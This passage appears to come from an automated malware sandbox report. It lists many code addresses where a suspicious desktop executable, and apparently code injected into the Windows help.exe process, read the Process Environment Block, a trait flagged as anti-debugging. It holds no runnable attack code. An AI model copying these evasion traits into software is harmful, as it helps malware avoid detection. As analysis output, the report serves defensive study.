          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01805BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01741B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01741B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01774A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01774A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01735210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01753A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01748A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01757D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01773D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017E3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01734F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01734F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01748794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01768E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01778EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E453CA mov eax, dword ptr fs:[00000030h]
